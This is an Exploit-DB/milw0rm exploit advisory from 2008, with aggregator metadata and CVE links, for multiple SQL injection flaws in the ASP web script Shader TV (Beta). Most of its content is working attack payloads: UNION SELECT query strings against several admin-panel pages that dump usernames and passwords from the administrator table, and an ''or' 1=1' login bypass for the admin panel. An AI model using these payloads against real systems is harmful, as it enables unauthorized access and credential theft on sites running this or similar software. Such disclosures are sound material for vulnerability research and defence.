Lucene search
U238EDB-ID:5564HistoryMay 08, 2008 - 12:00 a.m.
Shader TV (Beta) - Multiple SQL Injections
2008-05-0800:00:00
U238
www.exploit-db.com
33
AI Score
7.4
Confidence
Low
Shader TV (Beta) Multiple Remote SQL Ä°njection Vulnerable
Script : http://www.aspindir.com/indir.asp?ID=5441
Script : http://rapidshare.de/files/39341463/ShaderTV.zip.html
Coded : Asp
Lnguae : Acces
Discovered By U238 | < Ugurcan Engin >
Friends : ka0x - The_BekiR - Marco Almeida - Erhan Bulut - Caborz :
Web - Designer Solution Developer
[email protected]
http://noexec.blogspot.com
0x1 = [S** Says : Allah Belanı Versin Ulan Şiz0 !]
0x2 = [Ben Sadece Ä°yi Bir Ä°nsan Olmak Ä°stemistim ]
Exploit:
Administrator Login to creative web panel is atack of to SQL injectin.
http://localhost:2222/lab/ShaderTV/yonet/kanal.asp?islem=degistir&sid=13+union+select+0,kullanici,parola,3,4,5+from+tblyonetici
----
http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,parola+from+tblyonetici&sayfa=1
http://localhost:2222/lab/ShaderTV/yonet/google.asp?islem=degistir&sid=1+union+select+0,kullanici+from+tblyonetici&sayfa=1
----
http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,parola+from+tblyonetici
http://localhost:2222/lab/ShaderTV/yonet/hakk.asp?islem=degistir&sid=2+union+select+0,kullanici+from+tblyonetici
Administrator Panel :
target/ShaderTV/yonet
-------------------------------
Admin Panel Login Bypass :
target/ShaderTV/yonet/default.asp
username : 'or' 1=1
password : 'or' 1=1
This is Admin Panel See You ?
---------------------------------
# milw0rm.com [2008-05-08]Related
cve
cve
CVE-2008-6641
2009-04-07 14:17:17
prion
prion
Sql injection
2009-04-07 14:17:00
nvd
nvd
CVE-2008-6641
2009-04-07 14:17:17
cvelist
cvelist
CVE-2008-6641
2009-04-07 10:00:00